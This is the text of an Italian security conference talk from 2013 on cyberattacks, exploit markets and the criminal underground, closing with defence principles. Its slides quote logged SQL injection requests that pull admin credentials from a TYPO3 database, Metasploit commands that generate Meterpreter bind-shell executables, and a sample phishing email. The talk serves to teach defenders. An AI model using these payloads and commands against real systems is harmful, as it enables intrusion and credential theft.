Page 1
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
ATTACCHI, BUGIE E UNDERGROUND DIGITALE
Speaker: Andrea Pompili
There are only 10 types of people in the world:
Those who understand binary, and those who don't
Page 2
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 3
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
«
»
> Bonifica e Hardening fatta a tappeto un anno prima
> Sistemi Operativi Patched all’ultima versione disponibile
> Logging integrale di tutte le attività del Sito
> 2 Sistemi IPS (Intrusion Prevention System) in cascata
Page 4
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Outside 70%
Inside - Accidental 12%
Inside - Malicious 9%
Inside 5%
Unknown 4%
Source: http://datalossdb.org/ Statistiche 2012
Page 5
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
7,20%
6,20%
6,10%
5,70%
6,80%
6,80%
29,90%
41,20%
27,20%
34,10%
34,10%
30,70%
62,90%
52,60%
66,70%
60,20%
59,10%
62,50%
Attacchi complessivi rilevati dal 2007 Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
Page 6
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
76,00%
3,80%
16,80%
3,40%
76,00%
6,50%
13,70%
3,80%
76,40%
6,70%
13,70%
3,20%
Impatto degli Attacchi rilevati Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
Page 7
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
«Non è obiettivo di questo “focus” riportare in dettaglio i
risultati della rilevazione ma analizzando i dati relativi ai valori
medi per l’intero campione si può ritenere che i risultati siano:
• soddisfacenti per la protezione logica;
• molto soddisfacenti per la sicurezza dell’infrastruttura;
• sufficienti per la sicurezza dei servizi;
• da migliorare per la sicurezza dell’organizzazione.
«Possiamo dire che ce l’aspettavamo»
Page 8
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 9
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 10
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 11
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Aki Mon Telecom Shane Atkinson
Canter & Siegel
Eddie Davidson
Peter Francis-Macrae
Davis Wolfgang Hawke
Jumpstart Technologies
Vandar Kushnir
Kevin Lipnitz
Wayne Mansfield
Oleg Nikolaenko
Alan Ralsky
Dave Rhodes
Scott Richter
Russian Business Network
iFrame Cash
SBT Telecom Network
Defcon Host
Micronnet Ltd.
InstallsCash
Sendar Argic
Richard Colbert Source: Panda Security «The Cyber-crime Black Market: Uncovered> - 2011
RBNet
Page 12
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
Page 13
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 14
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
(*) According to Frank Rieger
Chief technology officer at GSMK
Page 15
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Source: Vincenzo Iozzo – OWASP Day 2012
Page 16
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Source: Vincenzo Iozzo – OWASP Day 2012
Page 17
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
So, how does one get full remote code execution in Chrome? In the case of
Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to
successfully break out of the Chrome sandbox.
(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)
Last year (2011), VUPEN released a video to demonstrate a
successful sandbox escape against Chrome but Google challenged
the validity of that hack, claiming it exploited third-party code,
believed to be the Adobe Flash plugin. (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-
sandbox-first-to-fall/10588)
Page 18
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Blackole Exploit Kit
Cool Exploit Kit
Page 19
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page 20
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 21
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 22
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 23
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Da: [email protected]
Inviato: Thursday, November 04, 2004 7:48 PM
A: [email protected]
Oggetto: Aggiornamento configurazione
Salve,
riceve questa mail in quanto sono stati rilevati dei problemi con il suo account di posta elettronica. La causa di
tali problemi e' riscontrabile in una non corretta configurazione del Suo computer che La preghiamo di
aggiornare collegandosi al seguente indirizzo:
http://xxxx.rcs.it/software/av/index.html
La preghiamo di eseguire lo script, Configurazione.vbe, di autoconfigurazione il cui link e ' disponibile nella
pagina indicata. Al termine della configurazione Le apparira' un messaggio di conferma dell'esito positivo
dell'aggiornamento.
Distinti Saluti
Help Desk - Supporto Tecnico RCS
RCS Editori S.p.A. - Settore Quotidiani
Page 24
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 25
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 26
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 27
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
173.254.216.69 - - [13/Nov/2012:20:03:35 +0100]
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"
178.32.211.140 - - [13/Nov/2012:20:03:43 +0100]
"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=
1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,
substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),
floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”
Page 28
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
89.253.105.39 - - [15/Nov/2012:12:32:14 +0100]
"GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=
11502+and(select+1+from(select+count(*),concat_ws(0x3a,
substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),
repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(
rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+"
"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"
Web Shell Extension
Page 29
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
http://evader.stonesoft.com/
http://insecure.org/stf/secnet_ids/secnet_ids.html
Page 30
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 31
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
msfpayload windows/meterpreter/bind_tcp X >
moca_x86_tcp_4444.exe
Page 32
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
msfpayload windows/x64/meterpreter/bind_tcp X >
moca_x64_tcp_4444.exe
Page 33
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
“The truth is, consumer-grade antivirus products can’t
protect against targeted malware created by well-
resourced nation-states with bulging budgets.
They can protect you against run-of-the-mill malware:
banking trojans, keystroke loggers and e-mail worms.
But targeted attacks like these go to great lengths to
avoid antivirus products on purpose”
Page 34
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
<#1> Ragiona come un Attaccante in modo da comprendere
cosa faranno e come ti attaccheranno
<#2> Cerca di capire i loro obiettivi, la capacità che hanno, ma
soprattutto i vincoli operativi che hanno
<#3> Identifica il valore «percepito» di ciò che vuoi
difendere, ma soprattutto cosa vuoi difendere
<#4> Lavora su tutto il perimetro di difesa, senza atti di fede
<#5> Se la tua difesa è più economica dell’attacco,
tu sarai sempre in vantaggio
Page 35
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Page 36
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROMA 20-23.03.2013 www.codemotionworld.com
Domande? Italian
مطالب أيةArabic
¿Preguntas? Spanish
Questions? English
tupoQghachmey Klingon
Sindarin
Japanese
Ερωτήσεις? Greek
вопросы? Russian